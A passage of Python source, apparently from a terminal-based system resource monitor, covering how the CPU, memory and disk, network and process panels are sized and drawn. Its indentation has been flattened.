if not CONFIG.cpu_single_graph and CONFIG.cpu_graph_upper != CONFIG.cpu_graph_lower:
mid_line = True
if h % 2: hh = floor(h / 2)
else: hh2 -= 1
hide_cores: bool = (cpu.cpu_temp_only or not CONFIG.show_coretemp) and cpu.got_sensors
ct_width: int = (max(6, 6 * cls.column_size)) * hide_cores
if cls.resized or cls.redraw:
if not "m" in Key.mouse:
Key.mouse["m"] = [[cls.x + 16 + i, cls.y] for i in range(12)]
out_misc += f'{Mv.to(cls.y, cls.x + 16)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("m")}{THEME.title}ode:{Box.view_mode}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}'
Graphs.cpu["up"] = Graph(w - bw - 3, (h if CONFIG.cpu_single_graph else hh), THEME.gradient["cpu"], cpu.cpu_upper, round_up_low=True)
if not CONFIG.cpu_single_graph:
Graphs.cpu["down"] = Graph(w - bw - 3, hh2, THEME.gradient["cpu"], cpu.cpu_lower, invert=CONFIG.cpu_invert_lower, round_up_low=True)
Meters.cpu = Meter(cpu.cpu_usage[0][-1], bw - (21 if cpu.got_sensors else 9), "cpu")
if cls.column_size > 0 or ct_width > 0:
for n in range(THREADS):
Graphs.cores[n] = Graph(5 * cls.column_size + ct_width, 1, None, cpu.cpu_usage[n + 1])
if cpu.got_sensors:
Graphs.temps[0] = Graph(5, 1, None, cpu.cpu_temp[0], max_value=cpu.cpu_temp_crit, offset=-23)
if cls.column_size > 1:
for n in range(1, THREADS + 1):
if not cpu.cpu_temp[n]:
continue
Graphs.temps[n] = Graph(5, 1, None, cpu.cpu_temp[n], max_value=cpu.cpu_temp_crit, offset=-23)
Draw.buffer("cpu_misc", out_misc, only_save=True)
if CONFIG.show_battery and cls.battery_activity():
bat_out: str = ""
if cls.battery_secs > 0:
battery_time: str = f' {cls.battery_secs // 3600:02}:{(cls.battery_secs % 3600) // 60:02}'
else:
battery_time = ""
if not hasattr(Meters, "battery") or cls.resized:
Meters.battery = Meter(cls.battery_percent, 10, "cpu", invert=True)
battery_symbol: str = cls.battery_symbols.get(cls.battery_status, "○")
battery_len: int = len(f'{CONFIG.update_ms}') + (11 if cls.width >= 100 else 0) + len(battery_time) + len(f'{cls.battery_percent}')
battery_pos = cls.width - battery_len - 17
if (battery_pos != cls.old_battery_pos or battery_len != cls.old_battery_len) and cls.old_battery_pos > 0 and not cls.resized:
bat_out += f'{Mv.to(y-1, cls.old_battery_pos)}{THEME.cpu_box(Symbol.h_line*(cls.old_battery_len+4))}'
cls.old_battery_pos, cls.old_battery_len = battery_pos, battery_len
bat_out += (f'{Mv.to(y-1, battery_pos)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.title}BAT{battery_symbol} {cls.battery_percent}%'+
("" if cls.width < 100 else f' {Fx.ub}{Meters.battery(cls.battery_percent)}{Fx.b}') +
f'{THEME.title}{battery_time}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}')
Draw.buffer("battery", f'{bat_out}{Term.fg}', only_save=Menu.active)
elif cls.battery_clear:
out += f'{Mv.to(y-1, cls.old_battery_pos)}{THEME.cpu_box(Symbol.h_line*(cls.old_battery_len+4))}'
cls.battery_clear = False
cls.battery_percent = 1000
cls.battery_secs = 0
cls.battery_status = "Unknown"
cls.old_battery_pos = 0
cls.old_battery_len = 0
cls.battery_path = ""
Draw.clear("battery", saved=True)
cx = cy = cc = 0
ccw = (bw + 1) // cls.box_columns
if cpu.cpu_freq:
freq: str = f'{cpu.cpu_freq} Mhz' if cpu.cpu_freq < 1000 else f'{float(cpu.cpu_freq / 1000):.1f} GHz'
out += f'{Mv.to(by - 1, bx + bw - 9)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title(freq)}{Fx.ub}{THEME.div_line(Symbol.title_right)}'
out += f'{Mv.to(y, x)}{Graphs.cpu["up"](None if cls.resized else cpu.cpu_upper[-1])}'
if mid_line:
out += (f'{Mv.to(y+hh, x-1)}{THEME.cpu_box(Symbol.title_right)}{THEME.div_line}{Symbol.h_line * (w - bw - 3)}{THEME.div_line(Symbol.title_left)}'
f'{Mv.to(y+hh, x+((w-bw)//2)-((len(CONFIG.cpu_graph_upper)+len(CONFIG.cpu_graph_lower))//2)-4)}{THEME.main_fg}{CONFIG.cpu_graph_upper}{Mv.r(1)}▲▼{Mv.r(1)}{CONFIG.cpu_graph_lower}')
if not CONFIG.cpu_single_graph and Graphs.cpu.get("down"):
out += f'{Mv.to(y + hh + (1 * mid_line), x)}{Graphs.cpu["down"](None if cls.resized else cpu.cpu_lower[-1])}'
out += (f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b}{"CPU "}{Fx.ub}{Meters.cpu(cpu.cpu_usage[0][-1])}'
f'{THEME.gradient["cpu"][cpu.cpu_usage[0][-1]]}{cpu.cpu_usage[0][-1]:>4}{THEME.main_fg}%')
if cpu.got_sensors:
try:
temp, unit = temperature(cpu.cpu_temp[0][-1], CONFIG.temp_scale)
out += (f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][min_max(cpu.cpu_temp[0][-1], 0, cpu.cpu_temp_crit) * 100 // cpu.cpu_temp_crit]}{Graphs.temps[0](None if cls.resized else cpu.cpu_temp[0][-1])}'
f'{temp:>4}{THEME.main_fg}{unit}')
except:
cpu.got_sensors = False
cy += 1
for n in range(1, THREADS + 1):
out += f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b + "C" + Fx.ub if THREADS < 100 else ""}{str(n):<{2 if cls.column_size == 0 else 3}}'
if cls.column_size > 0 or ct_width > 0:
out += f'{THEME.inactive_fg}{"⡀" * (5 * cls.column_size + ct_width)}{Mv.l(5 * cls.column_size + ct_width)}{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}{Graphs.cores[n-1](None if cls.resized else cpu.cpu_usage[n][-1])}'
else:
out += f'{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}'
out += f'{cpu.cpu_usage[n][-1]:>{3 if cls.column_size < 2 else 4}}{THEME.main_fg}%'
if cpu.got_sensors and cpu.cpu_temp[n] and not hide_cores:
try:
temp, unit = temperature(cpu.cpu_temp[n][-1], CONFIG.temp_scale)
if cls.column_size > 1:
out += f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][min_max(cpu.cpu_temp[n][-1], 0, cpu.cpu_temp_crit) * 100 // cpu.cpu_temp_crit]}{Graphs.temps[n](None if cls.resized else cpu.cpu_temp[n][-1])}'
else:
out += f'{THEME.gradient["temp"][min_max(temp, 0, cpu.cpu_temp_crit) * 100 // cpu.cpu_temp_crit]}'
out += f'{temp:>4}{THEME.main_fg}{unit}'
except:
cpu.got_sensors = False
elif cpu.got_sensors and not hide_cores:
out += f'{Mv.r(max(6, 6 * cls.column_size))}'
out += f'{THEME.div_line(Symbol.v_line)}'
cy += 1
if cy > ceil(THREADS/cls.box_columns) and n != THREADS:
cc += 1; cy = 1; cx = ccw * cc
if cc == cls.box_columns: break
if cy < bh - 1: cy = bh - 1
if cy < bh and cc < cls.box_columns:
if cls.column_size == 2 and cpu.got_sensors:
lavg = f' Load AVG: {" ".join(str(l) for l in cpu.load_avg):^19.19}'
elif cls.column_size == 2 or (cls.column_size == 1 and cpu.got_sensors):
lavg = f'LAV: {" ".join(str(l) for l in cpu.load_avg):^14.14}'
elif cls.column_size == 1 or (cls.column_size == 0 and cpu.got_sensors):
lavg = f'L {" ".join(str(round(l, 1)) for l in cpu.load_avg):^11.11}'
else:
lavg = f'{" ".join(str(round(l, 1)) for l in cpu.load_avg[:2]):^7.7}'
out += f'{Mv.to(by + cy, bx + cx)}{THEME.main_fg}{lavg}{THEME.div_line(Symbol.v_line)}'
if CONFIG.show_uptime:
out += f'{Mv.to(y + (0 if not CONFIG.cpu_invert_lower or CONFIG.cpu_single_graph else h - 1), x + 1)}{THEME.graph_text}{Fx.trans("up " + cpu.uptime)}'
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.resized = cls.redraw = cls.clock_block = False
class MemBox(Box):
name = "mem"
num = 2
height_p = 38
width_p = 45
min_w: int = 36
min_h: int = 10
x = 1
y = 1
mem_meter: int = 0
mem_size: int = 0
disk_meter: int = 0
divider: int = 0
mem_width: int = 0
disks_width: int = 0
disks_io_h: int = 0
disks_io_order: List[str] = []
graph_speeds: Dict[str, int] = {}
graph_height: int
resized: bool = True
redraw: bool = False
buffer: str = "mem"
swap_on: bool = CONFIG.show_swap
Box.buffers.append(buffer)
mem_names: List[str] = ["used", "available", "cached", "free"]
swap_names: List[str] = ["used", "free"]
@classmethod
def _calc_size(cls):
if not "mem" in cls.boxes:
Box._b_mem_h = 0
cls.width = Term.width
return
width_p: int; height_p: int
if not "proc" in cls.boxes:
width_p = 100
else:
width_p = cls.width_p
if not "cpu" in cls.boxes:
height_p = 60 if "net" in cls.boxes else 98
elif not "net" in cls.boxes:
height_p = 98 - CpuBox.height_p
else:
height_p = cls.height_p
cls.width = round(Term.width * width_p / 100)
cls.height = round(Term.height * height_p / 100) + 1
if cls.height + Box._b_cpu_h > Term.height: cls.height = Term.height - Box._b_cpu_h
Box._b_mem_h = cls.height
cls.y = Box._b_cpu_h + 1
if CONFIG.show_disks:
cls.mem_width = ceil((cls.width - 3) / 2)
cls.disks_width = cls.width - cls.mem_width - 3
if cls.mem_width + cls.disks_width < cls.width - 2: cls.mem_width += 1
cls.divider = cls.x + cls.mem_width
else:
cls.mem_width = cls.width - 1
item_height: int = 6 if cls.swap_on and not CONFIG.swap_disk else 4
if cls.height - (3 if cls.swap_on and not CONFIG.swap_disk else 2) > 2 * item_height: cls.mem_size = 3
elif cls.mem_width > 25: cls.mem_size = 2
else: cls.mem_size = 1
cls.mem_meter = cls.width - (cls.disks_width if CONFIG.show_disks else 0) - (9 if cls.mem_size > 2 else 20)
if cls.mem_size == 1: cls.mem_meter += 6
if cls.mem_meter < 1: cls.mem_meter = 0
if CONFIG.mem_graphs:
cls.graph_height = round(((cls.height - (2 if cls.swap_on and not CONFIG.swap_disk else 1)) - (2 if cls.mem_size == 3 else 1) * item_height) / item_height)
if cls.graph_height == 0: cls.graph_height = 1
if cls.graph_height > 1: cls.mem_meter += 6
else:
cls.graph_height = 0
if CONFIG.show_disks:
cls.disk_meter = cls.width - cls.mem_width - 23
if cls.disks_width < 25:
cls.disk_meter += 10
if cls.disk_meter < 1: cls.disk_meter = 0
@classmethod
def _draw_bg(cls) -> str:
if not "mem" in cls.boxes: return ""
out: str = ""
out += f'{create_box(box=cls, line_color=THEME.mem_box)}'
if CONFIG.show_disks:
out += (f'{Mv.to(cls.y, cls.divider + 2)}{THEME.mem_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("d")}{THEME.title("isks")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}'
f'{Mv.to(cls.y, cls.divider)}{THEME.mem_box(Symbol.div_up)}'
f'{Mv.to(cls.y + cls.height - 1, cls.divider)}{THEME.mem_box(Symbol.div_down)}{THEME.div_line}'
f'{"".join(f"{Mv.to(cls.y + i, cls.divider)}{Symbol.v_line}" for i in range(1, cls.height - 1))}')
Key.mouse["d"] = [[cls.divider + 3 + i, cls.y] for i in range(5)]
else:
out += f'{Mv.to(cls.y, cls.x + cls.width - 9)}{THEME.mem_box(Symbol.title_left)}{THEME.hi_fg("d")}{THEME.title("isks")}{THEME.mem_box(Symbol.title_right)}'
Key.mouse["d"] = [[cls.x + cls.width - 8 + i, cls.y] for i in range(5)]
return out
@classmethod
def _draw_fg(cls):
if not "mem" in cls.boxes: return
mem = MemCollector
if mem.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
gbg: str = ""
gmv: str = ""
gli: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
if cls.resized or cls.redraw:
cls.redraw = True
cls._calc_size()
out_misc += cls._draw_bg()
Meters.mem = {}
Meters.swap = {}
Meters.disks_used = {}
Meters.disks_free = {}
if cls.mem_meter > 0:
for name in cls.mem_names:
if CONFIG.mem_graphs:
Meters.mem[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.vlist[name])
else:
Meters.mem[name] = Meter(mem.percent[name], cls.mem_meter, name)
if cls.swap_on:
for name in cls.swap_names:
if CONFIG.swap_disk and CONFIG.show_disks:
break
elif CONFIG.mem_graphs and not CONFIG.swap_disk:
Meters.swap[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.swap_vlist[name])
else:
Meters.swap[name] = Meter(mem.swap_percent[name], cls.mem_meter, name)
if CONFIG.show_disks and mem.disks:
if CONFIG.show_io_stat or CONFIG.io_mode:
d_graph: List[str] = []
d_no_graph: List[str] = []
l_vals: List[Tuple[str, int, str, bool]] = []
if CONFIG.io_mode:
cls.disks_io_h = (cls.height - 2 - len(mem.disks)) // max(1, len(mem.disks_io_dict))
if cls.disks_io_h < 2: cls.disks_io_h = 1 if CONFIG.io_graph_combined else 2
else:
cls.disks_io_h = 1
if CONFIG.io_graph_speeds and not cls.graph_speeds:
try:
cls.graph_speeds = { spds.split(":")[0] : int(spds.split(":")[1]) for spds in list(i.strip() for i in CONFIG.io_graph_speeds.split(","))}
except (KeyError, ValueError):
errlog.error("Wrong formatting in io_graph_speeds variable. Using defaults.")
for name in mem.disks.keys():
if name in mem.disks_io_dict:
d_graph.append(name)
else:
d_no_graph.append(name)
continue
if CONFIG.io_graph_combined or not CONFIG.io_mode:
l_vals = [("rw", cls.disks_io_h, "available", False)]
else:
l_vals = [("read", cls.disks_io_h // 2, "free", False), ("write", cls.disks_io_h // 2, "used", True)]
Graphs.disk_io[name] = {_name : Graph(width=cls.disks_width - (6 if not CONFIG.io_mode else 0), height=_height, color=THEME.gradient[_gradient],
data=mem.disks_io_dict[name][_name], invert=_invert, max_value=cls.graph_speeds.get(name, 10), no_zero=True)
for _name, _height, _gradient, _invert in l_vals}
cls.disks_io_order = d_graph + d_no_graph
if cls.disk_meter > 0:
for n, name in enumerate(mem.disks.keys()):
if n * 2 > h: break
Meters.disks_used[name] = Meter(mem.disks[name]["used_percent"], cls.disk_meter, "used")
if len(mem.disks) * 3 <= h + 1:
Meters.disks_free[name] = Meter(mem.disks[name]["free_percent"], cls.disk_meter, "free")
if not "g" in Key.mouse:
Key.mouse["g"] = [[x + 8 + i, y-1] for i in range(5)]
out_misc += (f'{Mv.to(y-1, x + 7)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.mem_graphs else ""}'
f'{THEME.hi_fg("g")}{THEME.title("raph")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
if CONFIG.show_disks:
if not "s" in Key.mouse:
Key.mouse["s"] = [[x + w - 6 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x + w - 7)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.swap_disk else ""}'
f'{THEME.hi_fg("s")}{THEME.title("wap")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
if not "i" in Key.mouse:
Key.mouse["i"] = [[x + w - 10 + i, y-1] for i in range(2)]
out_misc += (f'{Mv.to(y-1, x + w - 11)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.io_mode else ""}'
f'{THEME.hi_fg("i")}{THEME.title("o")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
if Collector.collect_interrupt: return
Draw.buffer("mem_misc", out_misc, only_save=True)
try:
#* Mem
cx = 1; cy = 1
out += f'{Mv.to(y, x+1)}{THEME.title}{Fx.b}Total:{mem.string["total"]:>{cls.mem_width - 9}}{Fx.ub}{THEME.main_fg}'
if cls.graph_height > 0:
gli = f'{Mv.l(2)}{THEME.mem_box(Symbol.title_right)}{THEME.div_line}{Symbol.h_line * (cls.mem_width - 1)}{"" if CONFIG.show_disks else THEME.mem_box}{Symbol.title_left}{Mv.l(cls.mem_width - 1)}{THEME.title}'
if cls.graph_height >= 2:
gbg = f'{Mv.l(1)}'
gmv = f'{Mv.l(cls.mem_width - 2)}{Mv.u(cls.graph_height - 1)}'
big_mem: bool = cls.mem_width > 21
for name in cls.mem_names:
if cy > h - 1: break
if Collector.collect_interrupt: return
if cls.mem_size > 2:
out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.string[name])))}{Fx.trans(mem.string[name])}'
f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{gmv}{str(mem.percent[name])+"%":>4}')
cy += 2 if not cls.graph_height else cls.graph_height + 1
else:
out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 1 else 1.1}} {gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{mem.string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}'
cy += 1 if not cls.graph_height else cls.graph_height
#* Swap
if cls.swap_on and CONFIG.show_swap and not CONFIG.swap_disk and mem.swap_string:
if h - cy > 5:
if cls.graph_height > 0: out += f'{Mv.to(y+cy, x+cx)}{gli}'
cy += 1
out += f'{Mv.to(y+cy, x+cx)}{THEME.title}{Fx.b}Swap:{mem.swap_string["total"]:>{cls.mem_width - 8}}{Fx.ub}{THEME.main_fg}'
cy += 1
for name in cls.swap_names:
if cy > h - 1: break
if Collector.collect_interrupt: return
if cls.mem_size > 2:
out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.swap_string[name])))}{Fx.trans(mem.swap_string[name])}'
f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{gmv}{str(mem.swap_percent[name])+"%":>4}')
cy += 2 if not cls.graph_height else cls.graph_height + 1
else:
out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 1 else 1.1}} {gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{mem.swap_string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}'; cy += 1 if not cls.graph_height else cls.graph_height
if cls.graph_height > 0 and not cy == h: out += f'{Mv.to(y+cy, x+cx)}{gli}'
#* Disks
if CONFIG.show_disks and mem.disks:
cx = x + cls.mem_width - 1; cy = 0
big_disk: bool = cls.disks_width >= 25
gli = f'{Mv.l(2)}{THEME.div_line}{Symbol.title_right}{Symbol.h_line * cls.disks_width}{THEME.mem_box}{Symbol.title_left}{Mv.l(cls.disks_width - 1)}'
if CONFIG.io_mode:
for name in cls.disks_io_order:
item = mem.disks[name]
io_item = mem.disks_io_dict.get(name, {})
if Collector.collect_interrupt: return
if cy > h - 1: break
out += Fx.trans(f'{Mv.to(y+cy, x+cx)}{gli}{THEME.title}{Fx.b}{item["name"]:{cls.disks_width - 2}.12}{Mv.to(y+cy, x + cx + cls.disks_width - 11)}{item["total"][:None if big_disk else -2]:>9}')
if big_disk:
out += Fx.trans(f'{Mv.to(y+cy, x + cx + (cls.disks_width // 2) - (len(str(item["used_percent"])) // 2) - 2)}{Fx.ub}{THEME.main_fg}{item["used_percent"]}%')
cy += 1
if io_item:
if cy > h - 1: break
if CONFIG.io_graph_combined:
if cls.disks_io_h <= 1:
out += f'{Mv.to(y+cy, x+cx-1)}{" " * 5}'
out += (f'{Mv.to(y+cy, x+cx-1)}{Fx.ub}{Graphs.disk_io[name]["rw"](None if cls.redraw else mem.disks_io_dict[name]["rw"][-1])}'
f'{Mv.to(y+cy, x+cx-1)}{THEME.main_fg}{item["io"] or "RW"}')
cy += cls.disks_io_h
else:
if cls.disks_io_h <= 3:
out += f'{Mv.to(y+cy, x+cx-1)}{" " * 5}{Mv.to(y+cy+1, x+cx-1)}{" " * 5}'
out += (f'{Mv.to(y+cy, x+cx-1)}{Fx.ub}{Graphs.disk_io[name]["read"](None if cls.redraw else mem.disks_io_dict[name]["read"][-1])}'
f'{Mv.to(y+cy, x+cx-1)}{THEME.main_fg}{item["io_r"] or "R"}')
cy += cls.disks_io_h // 2
out += f'{Mv.to(y+cy, x+cx-1)}{Graphs.disk_io[name]["write"](None if cls.redraw else mem.disks_io_dict[name]["write"][-1])}'
cy += cls.disks_io_h // 2
out += f'{Mv.to(y+cy-1, x+cx-1)}{THEME.main_fg}{item["io_w"] or "W"}'
else:
for name, item in mem.disks.items():
if Collector.collect_interrupt: return
if not name in Meters.disks_used:
continue
if cy > h - 1: break
out += Fx.trans(f'{Mv.to(y+cy, x+cx)}{gli}{THEME.title}{Fx.b}{item["name"]:{cls.disks_width - 2}.12}{Mv.to(y+cy, x + cx + cls.disks_width - 11)}{item["total"][:None if big_disk else -2]:>9}')
if big_disk:
out += f'{Mv.to(y+cy, x + cx + (cls.disks_width // 2) - (len(item["io"]) // 2) - 2)}{Fx.ub}{THEME.main_fg}{Fx.trans(item["io"])}'
cy += 1
if cy > h - 1: break
if CONFIG.show_io_stat and name in Graphs.disk_io:
out += f'{Mv.to(y+cy, x+cx-1)}{THEME.main_fg}{Fx.ub}{" IO: " if big_disk else " IO " + Mv.l(2)}{Fx.ub}{Graphs.disk_io[name]["rw"](None if cls.redraw else mem.disks_io_dict[name]["rw"][-1])}'
if not big_disk and item["io"]:
out += f'{Mv.to(y+cy, x+cx-1)}{Fx.ub}{THEME.main_fg}{item["io"]}'
cy += 1
if cy > h - 1: break
out += Mv.to(y+cy, x+cx) + (f'Used:{str(item["used_percent"]) + "%":>4} ' if big_disk else "U ")
out += f'{Meters.disks_used[name](None if cls.resized else mem.disks[name]["used_percent"])}{item["used"][:None if big_disk else -2]:>{9 if big_disk else 7}}'
cy += 1
if len(mem.disks) * 3 + (len(mem.disks_io_dict) if CONFIG.show_io_stat else 0) <= h + 1:
if cy > h - 1: break
out += Mv.to(y+cy, x+cx)
out += f'Free:{str(item["free_percent"]) + "%":>4} ' if big_disk else f'{"F "}'
out += f'{Meters.disks_free[name](None if cls.resized else mem.disks[name]["free_percent"])}{item["free"][:None if big_disk else -2]:>{9 if big_disk else 7}}'
cy += 1
if len(mem.disks) * 4 + (len(mem.disks_io_dict) if CONFIG.show_io_stat else 0) <= h + 1: cy += 1
except (KeyError, TypeError):
return
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.resized = cls.redraw = False
class NetBox(Box, SubBox):
name = "net"
num = 3
height_p = 30
width_p = 45
min_w: int = 36
min_h: int = 6
x = 1
y = 1
resized: bool = True
redraw: bool = True
graph_height: Dict[str, int] = {}
symbols: Dict[str, str] = {"download" : "▼", "upload" : "▲"}
buffer: str = "net"
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
if not "net" in cls.boxes:
cls.width = Term.width
return
if not "proc" in cls.boxes:
width_p = 100
else:
width_p = cls.width_p
cls.width = round(Term.width * width_p / 100)
cls.height = Term.height - Box._b_cpu_h - Box._b_mem_h
cls.y = Term.height - cls.height + 1
cls.box_width = 27 if cls.width > 45 else 19
cls.box_height = 9 if cls.height > 10 else cls.height - 2
cls.box_x = cls.width - cls.box_width - 1
cls.box_y = cls.y + ((cls.height - 2) // 2) - cls.box_height // 2 + 1
cls.graph_height["download"] = round((cls.height - 2) / 2)
cls.graph_height["upload"] = cls.height - 2 - cls.graph_height["download"]
cls.redraw = True
@classmethod
def _draw_bg(cls) -> str:
if not "net" in cls.boxes: return ""
return f'{create_box(box=cls, line_color=THEME.net_box)}\
{create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title="Download", title2="Upload")}'
@classmethod
def _draw_fg(cls):
if not "net" in cls.boxes: return
net = NetCollector
if net.redraw: cls.redraw = True
if not net.nic: return
out: str = ""
out_misc: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2
reset: bool = bool(net.stats[net.nic]["download"]["offset"])
if cls.resized or cls.redraw:
out_misc += cls._draw_bg()
Key.mouse["b"] = [[x+w - len(net.nic[:10]) - 9 + i, y-1] for i in range(4)]
Key.mouse["n"] = [[x+w - 5 + i, y-1] for i in range(4)]
Key.mouse["z"] = [[x+w - len(net.nic[:10]) - 14 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 25)}{THEME.net_box}{Symbol.h_line * (10 - len(net.nic[:10]))}{Symbol.title_left}{Fx.b if reset else ""}{THEME.hi_fg("z")}{THEME.title("ero")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}'
f'{THEME.net_box}{Symbol.title_left}{Fx.b}{THEME.hi_fg("<b")} {THEME.title(net.nic[:10])} {THEME.hi_fg("n>")}{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
if w - len(net.nic[:10]) - 20 > 6:
Key.mouse["a"] = [[x+w - 20 - len(net.nic[:10]) + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 21 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if net.auto_min else ""}{THEME.hi_fg("a")}{THEME.title("uto")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
if w - len(net.nic[:10]) - 20 > 13:
Key.mouse["y"] = [[x+w - 26 - len(net.nic[:10]) + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 27 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if CONFIG.net_sync else ""}{THEME.title("s")}{THEME.hi_fg("y")}{THEME.title("nc")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
if net.address and w - len(net.nic[:10]) - len(net.address) - 20 > 15:
out_misc += (f'{Mv.to(y-1, x+7)}{THEME.net_box(Symbol.title_left)}{Fx.b}{THEME.title(net.address)}{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
Draw.buffer("net_misc", out_misc, only_save=True)
cy = 0
for direction in ["download", "upload"]:
strings = net.strings[net.nic][direction]
stats = net.stats[net.nic][direction]
if cls.redraw: stats["redraw"] = True
if stats["redraw"] or cls.resized:
Graphs.net[direction] = Graph(w - bw - 3, cls.graph_height[direction], THEME.gradient[direction], stats["speed"], max_value=net.sync_top if CONFIG.net_sync else stats["graph_top"],
invert=direction != "download", color_max_value=net.net_min.get(direction) if CONFIG.net_color_fixed else None, round_up_low=True)
out += f'{Mv.to(y if direction == "download" else y + cls.graph_height["download"], x)}{Graphs.net[direction](None if stats["redraw"] else stats["speed"][-1])}'
out += (f'{Mv.to(by+cy, bx)}{THEME.main_fg}{cls.symbols[direction]} {strings["byte_ps"]:<10.10}' +
("" if bw < 20 else f'{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["bit_ps"] + ")":>12.12}'))
cy += 1 if bh != 3 else 2
if bh >= 6:
out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Top:"}{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["top"] + ")":>12.12}'
cy += 1
if bh >= 4:
out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Total:"}{Mv.to(by+cy, bx+bw - 10)}{strings["total"]:>10.10}'
if bh > 2 and bh % 2: cy += 2
else: cy += 1
stats["redraw"] = False
out += (f'{Mv.to(y, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["download"]["graph_top"])}'
f'{Mv.to(y+h-1, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["upload"]["graph_top"])}')
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.redraw = cls.resized = False
class ProcBox(Box):
name = "proc"
num = 4
height_p = 68
width_p = 55
min_w: int = 44
min_h: int = 16
x = 1
y = 1
current_y: int = 0
current_h: int = 0
select_max: int = 0
selected: int = 0
selected_pid: int = 0
last_selection: int = 0
filtering: bool = False
moved: bool = False
start: int = 1
count: int = 0
s_len: int = 0
detailed: bool = False
detailed_x: int = 0
detailed_y: int = 0
detailed_width: int = 0
detailed_height: int = 8
resized: bool = True
redraw: bool = True
buffer: str = "proc"
pid_counter: Dict[int, int] = {}
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
if not "proc" in cls.boxes:
cls.width = Term.width
return
width_p: int; height_p: int
if not "net" in cls.boxes and not "mem" in cls.boxes:
width_p = 100
else:
width_p = cls.width_p
if not "cpu" in cls.boxes:
height_p = 100
else:
height_p = cls.height_p
cls.width = round(Term.width * width_p / 100)
cls.height = round(Term.height * height_p / 100)
if cls.height + Box._b_cpu_h > Term.height: cls.height = Term.height - Box._b_cpu_h
cls.x = Term.width - cls.width + 1
cls.y = Box._b_cpu_h + 1
cls.current_y = cls.y
cls.current_h = cls.height
cls.select_max = cls.height - 3
cls.redraw = True
cls.resized = True
@classmethod
def _draw_bg(cls) -> str:
if not "proc" in cls.boxes: return ""
return create_box(box=cls, line_color=THEME.proc_box)
@classmethod
def selector(cls, key: str, mouse_pos: Tuple[int, int] = (0, 0)):
old: Tuple[int, int] = (cls.start, cls.selected)
new_sel: int
if key in ["up", "k"]:
if cls.selected == 1 and cls.start > 1:
cls.start -= 1
elif cls.selected == 1:
cls.selected = 0
elif cls.selected > 1:
cls.selected -= 1
elif key in ["down", "j"]:
if cls.selected == 0 and ProcCollector.detailed and cls.last_selection:
cls.selected = cls.last_selection
cls.last_selection = 0
